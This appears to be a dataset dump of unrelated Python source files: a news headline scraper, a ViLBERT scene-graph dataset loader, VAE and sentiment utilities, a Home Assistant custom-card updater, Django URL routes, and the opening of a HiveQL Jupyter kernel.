ToutiaoDataWriter\n\n\nclass SpiderV5(object):\n \"\"\"\n spider\n \"\"\"\n\n def __init__(self, baseurl):\n self.baseurl = baseurl\n self.data_list = []\n self.session = requests.session()\n self.headers = {\n \"Connection\": \"close\",\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 \\\n (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'\n }\n time_now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n dt = time.strptime(time_now, \"%Y-%m-%d %H:%M:%S\")\n self.insert_time_stamp = int(time.mktime(dt))\n self.insert_time = time_now\n\n def start_spider(self):\n \"\"\"\n 开始spider\n \"\"\"\n res = self.session.get(url=self.baseurl, headers=self.headers)\n html = etree.HTML(res.content)\n trs_list = html.xpath('//*[@id=\"listhot2\"]/li/a')\n result = []\n for _, tr in enumerate(trs_list):\n tr_title = tr.xpath(\".//text()\")[0].strip()\n tr_url = tr.xpath(\".//@href\")[0].strip()\n\n data = {\"content\": '',\n 'title': tr_title,\n 'url': \"https://tophub.today\" + tr_url,\n 'create_time_stamp': 0,\n 'hot_tag': '',\n 'site_name': '',\n 'cnt': 0\n }\n result.append(data)\n for _, item in enumerate(result):\n # 生成ids\n m = hashlib.md5(item[\"title\"].encode(encoding='utf-8'))\n item_id = m.hexdigest()\n item[\"news_daily_no\"] = item_id\n return result\n\n def start(self):\n print('执行澎湃爬虫')\n baseurl = 'https://www.thepaper.cn'\n select_bre = SpiderV5(baseurl=baseurl)\n datalist = select_bre.start_spider()\n ToutiaoDataWriter().do_write(datalist)\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 2:\n baseurl = sys.argv[1]\n else:\n baseurl = 'https://www.thepaper.cn'\n select_bre = SpiderV5(baseurl=baseurl)\n datalist = select_bre.start_spider()\n ToutiaoDataWriter().do_write(datalist)\n", "sub_path": "spider_pengpai_v1.py", "file_name": "spider_pengpai_v1.py", "file_ext": "py", "file_size_in_byte": 2419, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.session", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "name"}, {"api_name": "time.strptime", "line_number": 35, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 44, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 44, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 62, "usage_type": "call"}, 
{"api_name": "data_writer.data_writer.ToutiaoDataWriter", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "data_writer.data_writer.ToutiaoDataWriter", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "234865807", "text": "import json\nfrom typing import Any, Dict, List\nimport random\nimport os\n\nimport torch\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport _pickle as cPickle\nimport json_lines\n\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom ._image_features_reader import ImageFeaturesH5Reader\nimport pdb\nimport csv\nimport sys\n\ndef assert_eq(real, expected):\n assert real == expected, \"%s (true) vs %s (expected)\" % (real, expected)\n\ndef _converId(img_id):\n\n img_id = img_id.split('-')\n if 'train' in img_id[0]:\n new_id = int(img_id[1])\n elif 'val' in img_id[0]:\n new_id = int(img_id[1]) + 1000000 \n elif 'test' in img_id[0]:\n new_id = int(img_id[1]) + 2000000 \n else:\n pdb.set_trace()\n\n return new_id\n\n\ndef _load_annotationsVGSG_R(annotations_jsonpath, split):\n entries = []\n with open(annotations_jsonpath, 'r') as f:\n scene_graphs = json.load(f)\n if split=='train':\n scene_graphs = scene_graphs[:int(0.9*len(scene_graphs))]\n elif split=='val':\n scene_graphs = scene_graphs[int(0.9*len(scene_graphs)):]\n for scene_graph in scene_graphs:\n if split == 'test':\n pass\n else:\n objects = scene_graph['objects']\n if len(objects)==0:\n continue\n objects2name = {x['object_id']:(x['names'][0], x['synsets'][0] if len(x['synsets'])>0 else -1) for x in objects}\n object_list = list(objects2name.values())\n relationships = scene_graph['relationships']\n relation_tuples = [(objects2name[x[\"subject_id\"]], (x['predicate'], x['synsets'][0] if len(x['synsets'])>0 else -1), objects2name[x[\"object_id\"]]) for x in relationships]\n num_obj = len(objects)\n num_rel = len(relation_tuples)\n # filter out phrase relation\n filtered_relation_tuples = [] \n for rel in relation_tuples:\n if len(rel[1][0].split())==1 and len(rel[0][0].split())==1 and len(rel[2][0].split())==1:\n filtered_relation_tuples.append(rel)\n entries.append(\n {\"image_id\":scene_graph['image_id'], 'relations': filtered_relation_tuples, 'objects': object_list}\n )\n\n return entries\n\nclass VGSGDataset(Dataset):\n def __init__(\n self,\n task: str,\n dataroot: str,\n annotations_jsonpath: str,\n split: str,\n image_features_reader: ImageFeaturesH5Reader,\n gt_image_features_reader: ImageFeaturesH5Reader,\n tokenizer: BertTokenizer,\n padding_index: int = 0,\n max_seq_length: int = 40,\n max_region_num: int = 60\n ):\n # All the keys in `self._entries` would be present in `self._image_features_reader`\n if task == 'VGenomeSceneGraph':\n self._entries = _load_annotationsVGSG_R(annotations_jsonpath, split)\n else:\n assert False\n self._split = split\n self._image_features_reader = image_features_reader\n self._gt_image_features_reader = gt_image_features_reader\n self._tokenizer = tokenizer\n\n self._padding_index = padding_index\n self._max_seq_length = max_seq_length\n self._max_region_num = max_region_num\n self.num_labels = 1\n\n self._names = []\n if not os.path.exists(os.path.join(dataroot, \"cache\")):\n os.makedirs(os.path.join(dataroot, \"cache\"))\n\n # cache file path data/cache/train_ques\n cache_path = \"data/VGSG/cache/\" + split + '_' + task + \"_\" + str(max_seq_length) + \"_\" + str(max_region_num) + 
\"_vcr.pkl\"\n if not os.path.exists(cache_path):\n self.tokenize()\n self.tensorize()\n cPickle.dump(self._entries, open(cache_path, 'wb'))\n else:\n self._entries = cPickle.load(open(cache_path, \"rb\"))\n\n def tokenize(self):\n \"\"\"Tokenizes the captions.\n\n This will add caption_tokens in each entry of the dataset.\n -1 represents nil, and should be treated as padding_idx in embedding.\n \"\"\"\n count = 0\n for entry in self._entries:\n token_pairs = []\n for relation in entry['relations']:\n assert len(relation) == 3\n token_pairs.append((relation[0][0],relation[1][0],relation[2][0]))\n\n num_rels = len(entry['relations'])\n num_random_rels = (self._max_seq_length - 2) // 3 - num_rels\n\n if num_random_rels>0:\n pass\n # gt_pairs = {(rel[0],rel[2]) for rel in entry['relations']}\n # random_pairs = self._get_random_pair(entry['objects'], gt_pairs, num_random_rels)\n # for pair in list(random_pairs):\n # token_pairs.append((pair[0][0],'background', pair[1][0]))\n else:\n for i in range(-num_random_rels):\n token_pairs.pop()\n\n random.shuffle(token_pairs)\n tokens = []\n for pair in token_pairs:\n tokens.extend(pair)\n\n tokens = ['[CLS]'] + tokens + ['[SEP]']\n tokens_char = tokens\n\n target = [self._tokenizer.vocab.get(self._tokenizer.tokenize(x)[0], self._tokenizer.vocab['[UNK]']) if i%3==2 else -1 for i, x in enumerate(tokens)]\n tokens = [self._tokenizer.vocab.get(self._tokenizer.tokenize(x)[0], self._tokenizer.vocab['[UNK]']) if i%3!=2 else self._tokenizer.vocab.get('[MASK]', self._tokenizer.vocab['[UNK]']) for i, x in enumerate(tokens)]\n \n for i in range(len(tokens)):\n if target[i] != -1:\n print(tokens_char[i],tokens[i],target[i])\n\n segment_ids = [0] * len(tokens)\n input_mask = [1] * len(tokens)\n # input_mask = [1 if i%3==2 else 0 for i in range(len(tokens))]\n # co_attention_mask = [-1 if i%3==2 else 1 for i in range(len(tokens))]\n # co_attention_mask = torch.zeros((self._max_region_num, self._max_seq_length))\n # co_attention_mask[0] = -1\n # co_attention_mask[-1] = -1\n \n if len(tokens) < self._max_seq_length:\n padding = [self._padding_index] * (self._max_seq_length - len(tokens))\n tokens = tokens + padding\n input_mask += padding\n segment_ids += padding \n target += [-1] * len(padding) \n\n assert_eq(len(tokens), self._max_seq_length)\n entry['input_ids'] = tokens \n entry[\"input_mask\"] = input_mask\n entry['segment_ids'] = segment_ids\n # entry[\"co_attention_mask\"] = co_attention_mask\n entry['target'] = target\n\n sys.stdout.write('%d/%d\\r' % (count, len(self._entries)))\n sys.stdout.flush()\n count += 1\n\n def tensorize(self):\n\n for entry in self._entries:\n input_ids = torch.from_numpy(np.array(entry[\"input_ids\"]))\n entry[\"input_ids\"] = input_ids\n\n input_mask = torch.from_numpy(np.array(entry[\"input_mask\"]))\n entry[\"input_mask\"] = input_mask\n\n segment_ids = torch.from_numpy(np.array(entry[\"segment_ids\"]))\n entry[\"segment_ids\"] = segment_ids\n\n target = torch.from_numpy(np.array(entry[\"target\"]))\n entry[\"target\"] = target\n\n def _get_random_pair(self, object_list, gt_pairs, num_pairs):\n num_obj = len(object_list)\n candidate_pair_set = set()\n for i in range(num_obj):\n for j in range(i,num_obj):\n candidate_pair_set.add((object_list[i], object_list[j]))\n candidate_pair_set.add((object_list[j], object_list[i]))\n candidate_pair_set = candidate_pair_set - gt_pairs\n return random.choices(list(candidate_pair_set),k=min(num_pairs, len(candidate_pair_set)))\n\n def __getitem__(self, index):\n \n entry = 
self._entries[index]\n\n image_id = entry[\"image_id\"]\n features, num_boxes, boxes, _ = self._image_features_reader[image_id]\n\n boxes = boxes[:num_boxes]\n features = features[:num_boxes]\n\n gt_features, gt_num_boxes, gt_boxes, _ = self._gt_image_features_reader[image_id]\n\n # merge two features.\n features[0] = (features[0] * num_boxes + gt_features[0] * gt_num_boxes) / (num_boxes + gt_num_boxes)\n\n # merge two boxes, and assign the labels. \n gt_boxes = gt_boxes[1:gt_num_boxes]\n gt_features = gt_features[1:gt_num_boxes]\n gt_num_boxes = gt_num_boxes - 1\n\n gt_box_preserve = min(self._max_region_num-1, gt_num_boxes)\n gt_boxes = gt_boxes[:gt_box_preserve]\n gt_features = gt_features[:gt_box_preserve]\n gt_num_boxes = gt_box_preserve\n \n num_box_preserve = min(self._max_region_num - int(gt_num_boxes), int(num_boxes))\n boxes = boxes[:num_box_preserve]\n features = features[:num_box_preserve]\n\n # concatenate the boxes\n mix_boxes = np.concatenate((boxes, gt_boxes), axis=0)\n mix_features = np.concatenate((features, gt_features), axis=0)\n mix_num_boxes = num_box_preserve + int(gt_num_boxes)\n \n image_mask = [1] * (mix_num_boxes)\n while len(image_mask) < self._max_region_num:\n image_mask.append(0)\n\n mix_boxes_pad = np.zeros((self._max_region_num, 5))\n mix_features_pad = np.zeros((self._max_region_num, 2048))\n\n mix_boxes_pad[:mix_num_boxes] = mix_boxes[:mix_num_boxes]\n mix_features_pad[:mix_num_boxes] = mix_features[:mix_num_boxes]\n\n # appending the target feature.\n features = torch.tensor(mix_features_pad).float()\n image_mask = torch.tensor(image_mask).long()\n spatials = torch.tensor(mix_boxes_pad).float()\n\n input_ids = entry[\"input_ids\"]\n input_mask = entry[\"input_mask\"]\n segment_ids = entry[\"segment_ids\"]\n target = entry[\"target\"]\n\n assert_eq(len(input_ids),len(input_mask))\n assert_eq(len(input_mask),len(segment_ids))\n assert_eq(len(segment_ids),len(target))\n\n if self._split == 'test':\n # anno_id = entry[\"anno_id\"]\n anno_id = 0#entry[\"anno_id\"]\n else:\n anno_id = entry[\"image_id\"]\n\n co_attention_mask = torch.zeros((1, self._max_region_num, self._max_seq_length))\n input_ids = input_ids.unsqueeze(1)\n input_mask = input_mask.unsqueeze(1)\n segment_ids = segment_ids.unsqueeze(1)\n return features, spatials, image_mask, input_ids, target, input_mask, segment_ids, co_attention_mask, anno_id\n\n def __len__(self):\n return len(self._entries)\n\n def get_tokenizer(self):\n return self._tokenizer\n", "sub_path": "vilbert/datasets/vgsg_dataset.py", "file_name": "vgsg_dataset.py", "file_ext": "py", "file_size_in_byte": 10829, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pdb.set_trace", "line_number": 31, "usage_type": "call"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 68, "usage_type": "name"}, {"api_name": "_image_features_reader.ImageFeaturesH5Reader", "line_number": 75, "usage_type": "name"}, {"api_name": "_image_features_reader.ImageFeaturesH5Reader", "line_number": 76, "usage_type": "name"}, {"api_name": "pytorch_pretrained_bert.tokenization.BertTokenizer", "line_number": 77, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 99, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "_pickle.dump", "line_number": 106, "usage_type": "call"}, {"api_name": "_pickle.load", "line_number": 108, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 136, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 173, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 174, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 174, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 189, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 266, "usage_type": "call"}]} +{"seq_id": "408783726", "text": "import torch\nimport numpy as np\nfrom torch.autograd import Variable\nfrom collections import defaultdict, Counter, OrderedDict\nclass OrderedCounter(Counter, OrderedDict):\n 'Counter that remembers the order elements are first encountered'\n\n def __repr__(self):\n return '%s(%r)' % (self.__class__.__name__, OrderedDict(self))\n\n def __reduce__(self):\n return self.__class__, (OrderedDict(self),)\n\ndef to_var(x, cuda2, volatile=False):\n if torch.cuda.is_available():\n x = x.to(cuda2)\n return Variable(x, volatile=volatile)\n\n\ndef idx2word(idx, i2w, pad_idx):\n\n sent_str = [str()]*len(idx)\n\n for i, sent in enumerate(idx):\n\n for word_id in sent:\n\n if word_id == pad_idx:\n break\n sent_str[i] += i2w[str(word_id.item())] + \" \"\n\n sent_str[i] = sent_str[i].strip()\n\n\n return sent_str\n\n\ndef interpolate(start, end, steps):\n\n interpolation = np.zeros((start.shape[0], steps + 2))\n\n for dim, (s,e) in enumerate(zip(start,end)):\n interpolation[dim] = np.linspace(s,e,steps+2)\n\n return interpolation.T\n\n\ndef decoding_ouput(out, idx2word):\n\n\n out = out.detach().cpu().numpy()\n sentence_list = []\n for sent_idx in range(out.shape[0]):\n sentence = \"\"\n predict = out[sent_idx, :, :]\n keys = np.argmax(predict, axis=1)\n for key in keys:\n sentence += idx2word[str(key)] + \" \"\n sentence_list.append(sentence)\n\n return sentence_list\n\ndef expierment_name(args, ts):\n\n exp_name = str()\n exp_name += 
\"BS=%i_\"%args.batch_size\n exp_name += \"LR={}_\".format(args.learning_rate)\n exp_name += \"EB=%i_\"%args.embedding_size\n exp_name += \"%s_\"%args.rnn_type.upper()\n exp_name += \"HS=%i_\"%args.hidden_size\n exp_name += \"L=%i_\"%args.num_layers\n exp_name += \"BI=%i_\"%args.bidirectional\n exp_name += \"LS=%i_\"%args.latent_size\n exp_name += \"WD={}_\".format(args.word_dropout)\n exp_name += \"ANN=%s_\"%args.anneal_function.upper()\n exp_name += \"K={}_\".format(args.k)\n exp_name += \"X0=%i_\"%args.x0\n exp_name += \"TS=%s\"%ts\n\n return exp_name\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\ndef sentiment_analyzer_scores(sentence):\n analyser = SentimentIntensityAnalyzer()\n score = analyser.polarity_scores(sentence)\n return score['neg'], score['neu'], score['pos'], score['compound']\n\ndef sentiment_labeler(data):\n labels = np.zeros(4)\n labels = np.reshape(labels,(1,4))\n for idx, s in enumerate(data):\n print(idx)\n\n l = np.asarray(sentiment_analyzer_scores(s))\n l = np.reshape(l, (1, 4))\n\n labels = np.vstack((labels, l))\n\n labels = np.delete(labels, 0, 0)\n return labels\n\n\n", "sub_path": "multiple_attribute/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2716, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 5, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 5, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 56, "usage_type": "call"}, {"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "1937398", "text": "\"\"\"Logic to handle custom_cards.\"\"\"\nimport logging\nimport os\nimport requests\nfrom requests import RequestException\nfrom pyupdate.ha_custom import common\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef get_info_all_cards(custom_repos=None):\n \"\"\"Return all remote info if any.\"\"\"\n remote_info = {}\n for url in common.get_repo_data('card', custom_repos):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n for name, card in response.json().items():\n try:\n card = [\n name,\n card['version'],\n card['remote_location'],\n card['visit_repo'],\n card['changelog']\n ]\n remote_info[name] = card\n except KeyError:\n print('Could not get remote info for ' + name)\n except RequestException:\n print('Could not get remote info for ' + url)\n LOGGER.debug('get_info_all_cards: %s', remote_info)\n return 
remote_info\n\n\ndef get_lovelace_gen(base_dir):\n \"\"\"Get lovelace-gen true if in use.\"\"\"\n return_value = False\n conf_file = base_dir + '/ui-lovelace.yaml'\n lovelace_dir = base_dir + '/lovelace'\n if os.path.isfile(conf_file) and os.path.isdir(lovelace_dir):\n with open(conf_file, 'r') as local:\n for line in local.readlines():\n if 'generated by lovelace-gen.py' in line:\n return_value = True\n return return_value\n\n\ndef get_sensor_data(base_dir, show_installable=False, custom_repos=None):\n \"\"\"Get sensor data.\"\"\"\n cards = get_info_all_cards(custom_repos)\n cahce_data = {}\n cahce_data['domain'] = 'custom_cards'\n cahce_data['has_update'] = []\n count_updateable = 0\n if cards:\n for name, card in cards.items():\n remote_version = card[1]\n local_version = get_local_version(base_dir, name)\n has_update = (remote_version and\n remote_version != local_version)\n not_local = (remote_version and not local_version)\n if (not not_local and\n remote_version) or (show_installable and remote_version):\n if has_update and not not_local:\n count_updateable = count_updateable + 1\n cahce_data['has_update'].append(name)\n cahce_data[name] = {\n \"local\": local_version,\n \"remote\": remote_version,\n \"has_update\": has_update,\n \"not_local\": not_local,\n \"repo\": card[3],\n \"change_log\": card[4],\n }\n LOGGER.debug('get_sensor_data: [%s, %s]', cahce_data, count_updateable)\n return [cahce_data, count_updateable]\n\n\ndef update_all(base_dir, show_installable=False, custom_repos=None):\n \"\"\"Update all cards.\"\"\"\n updates = get_sensor_data(base_dir, show_installable,\n custom_repos)[0]['has_update']\n if updates is not None:\n LOGGER.info('update_all: \"%s\"', updates)\n for name in updates:\n upgrade_single(base_dir, name, custom_repos)\n else:\n LOGGER.debug('update_all: No updates avaiable.')\n\n\ndef upgrade_single(base_dir, name, custom_repos=None):\n \"\"\"Update one card.\"\"\"\n LOGGER.debug('upgrade_single started: \"%s\"', name)\n remote_info = get_info_all_cards(custom_repos)[name]\n remote_file = remote_info[2]\n local_file = get_card_dir(base_dir, name) + name + '.js'\n common.download_file(local_file, remote_file)\n upgrade_lib(base_dir, name, custom_repos)\n update_resource_version(base_dir, name, custom_repos)\n LOGGER.info('upgrade_single finished: \"%s\"', name)\n\n\ndef upgrade_lib(base_dir, name, custom_repos=None):\n \"\"\"Update one card-lib.\"\"\"\n remote_info = get_info_all_cards(custom_repos)[name]\n remote_file = remote_info[2][:-3] + '.lib.js'\n local_file = get_card_dir(base_dir, name) + name + '.lib.js'\n common.download_file(local_file, remote_file)\n\n\ndef install(base_dir, name, custom_repos=None):\n \"\"\"Install single card.\"\"\"\n if name in get_sensor_data(base_dir, True, custom_repos)[0]:\n upgrade_single(base_dir, name, custom_repos)\n\n\ndef update_resource_version(base_dir, name, custom_repos=None):\n \"\"\"Update the ui-lovelace file.\"\"\"\n local_version = get_local_version(base_dir, name)\n remote_version = get_info_all_cards(custom_repos)[name][1]\n conf_file = get_conf_file_path(base_dir)\n common.replace_all(conf_file,\n name + '.js?v=' + str(local_version),\n name + '.js?v=' + str(remote_version))\n\n\ndef get_card_dir(base_dir, name):\n \"\"\"Get card dir.\"\"\"\n conf_file = get_conf_file_path(base_dir)\n with open(conf_file, 'r') as local:\n for line in local.readlines():\n if get_lovelace_gen(base_dir):\n if name + '.js' in line:\n card = line.split('!resource ')[1].split(name + '.js')\n card_dir = base_dir + 
'/lovelace/' + card[0]\n break\n else:\n card_dir = base_dir + '/lovelace/'\n else:\n if '/' + name + '.js' in line:\n card = line.split(': ')[1].split(name + '.js')\n card_dir = base_dir + card[0].replace(\"local\", \"www\")\n break\n else:\n card_dir = base_dir + '/www/'\n return card_dir\n\n\ndef get_conf_file_path(base_dir):\n \"\"\"Get conf file.\"\"\"\n if get_lovelace_gen(base_dir):\n return_value = os.path.join(base_dir, 'lovelace', 'main.yaml')\n else:\n return_value = os.path.join(base_dir, 'ui-lovelace.yaml')\n return return_value\n\n\ndef get_local_version(base_dir, name):\n \"\"\"Return the local version if any.\"\"\"\n return_value = None\n card_config = ''\n conf_file = get_conf_file_path(base_dir)\n if os.path.isfile(conf_file):\n with open(conf_file, 'r') as local:\n for line in local.readlines():\n if '/' + name + '.js' in line:\n card_config = line\n break\n local.close()\n if '=' in card_config:\n local_version = card_config.split('=')[1].split('\\n')[0]\n return_value = local_version\n return return_value\n", "sub_path": "pyupdate/ha_custom/custom_cards.py", "file_name": "custom_cards.py", "file_ext": "py", "file_size_in_byte": 6493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common.get_repo_data", "line_number": 14, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.RequestException", "line_number": 30, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common.download_file", "line_number": 98, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 98, "usage_type": "name"}, {"api_name": "pyupdate.ha_custom.common.download_file", "line_number": 109, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 109, "usage_type": "name"}, {"api_name": "pyupdate.ha_custom.common.replace_all", "line_number": 123, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 123, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}]} +{"seq_id": "74530971", "text": "from django.conf.urls import url\n\nfrom . 
import views\n\n# GET / => (redirect: project_list)\n# GET /projects => project_list\n# POST /projects => create_project => (redirect: project_detail)\n# GET /projects/WELC => project_deail\n#\n# GET /WELC-1 => api_follow_ticket => 303 See Other\n# POST / => api_create_ticket => 201 Created\n\nurlpatterns = [\n url(r'^projects/$', views.project_list, name='project_list'),\n url(r'^projects/(?P[A-Z]+)/$', views.project_detail, name='project_detail'),\n url(r'^(?P[A-Z]+-[0-9]+)/$', views.api_follow_ticket, name='api_follow_ticket'),\n url(r'^$', views.api_create_ticket, name='api_create_ticket'),\n]", "sub_path": "urid/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 676, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "313298044", "text": "import json\nimport logging\nimport traceback\nimport re\nimport os.path\n\nfrom ipykernel.kernelbase import Kernel\nfrom sqlalchemy.exc import OperationalError, ResourceClosedError\n\nfrom .constants import __version__, KERNEL_NAME, CONFIG_FILE\n\nfrom sqlalchemy import *\nimport pandas as pd\nfrom .tool_sql import *\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass KernelSyntaxError(Exception):\n pass\n\n\nerror_con_not_created = \"\"\"Connection not initialized!\nPlease specify your pyHive configuration like this :\n\n-------------\n$$ url=hive://@:/\n$$ connect_args={\"auth\": \"KERBEROS\",\"kerberos_service_name\": \"hive\"}\n$$ pool_size=5\n$$ max_overflow=10\n\nYOUR SQL REQUEST HERE IF ANY\n-------------\n\n-> if you want to update the current connection, just type it again with another configuration\n-> $$ are mandatory characters that specify that this line is a configuration for this kernel\n\nOther parameters are available such as :\n\n$$ default_limit=50 # -> without this parameter, default_limit is set to 20\n$$ display_mode=be # -> this will display a table with the beginning (b) and end (e) of the SQL response (options are: b, e and be)\n\n\"\"\"\n\n\nclass ConnectionNotCreated(Exception):\n def __init__(self):\n Exception.__init__(self, error_con_not_created)\n\n\nclass HiveQLKernel(Kernel):\n implementation = KERNEL_NAME\n implementation_version = __version__\n banner = 'HiveQL REPL'\n language = \"hiveql\"\n language_info = {\n 'name': 'hive',\n 'codemirror_mode': \"sql\",\n 'pygments_lexer': 'postgresql',\n 'mimetype': 'text/x-hive',\n 'file_extension': '.hiveql',\n }\n last_conn = None\n params = {\n \"default_limit\": 20,\n \"display_mode\": \"be\"\n }\n conf = None\n conf_file = os.path.expanduser(CONFIG_FILE)\n if os.path.isfile(conf_file):\n with open(conf_file, mode='r') as file_hanlde:\n conf = json.load(file_hanlde)\n\n def send_exception(self, e):\n if type(e) in [ConnectionNotCreated]:\n tb = \"\"\n else:\n tb = \"\\n\" + traceback.format_exc()\n return self.send_error(str(e) + tb)\n\n def send_error(self, contents):\n self.send_response(self.iopub_socket, 'stream', {\n 'name': 'stderr',\n 'text': str(contents)\n })\n return {\n 'status': 'error',\n 'execution_count': self.execution_count,\n 'payload': [],\n 'user_expressions': {}\n }\n\n def send_info(self, contents):\n 
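# Aside on the urid/urls.py record above: django.conf.urls.url() is the
# pre-Django-2.0 spelling, and the named groups in the record (e.g.
# "(?P[A-Z]+)") appear to have lost their <name> part to HTML stripping.
# A hedged sketch of the same patterns on modern Django with re_path(),
# assuming the same `views` module:
from django.urls import re_path
from . import views

urlpatterns = [
    re_path(r'^projects/$', views.project_list, name='project_list'),
    re_path(r'^projects/(?P<project>[A-Z]+)/$', views.project_detail,
            name='project_detail'),
]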
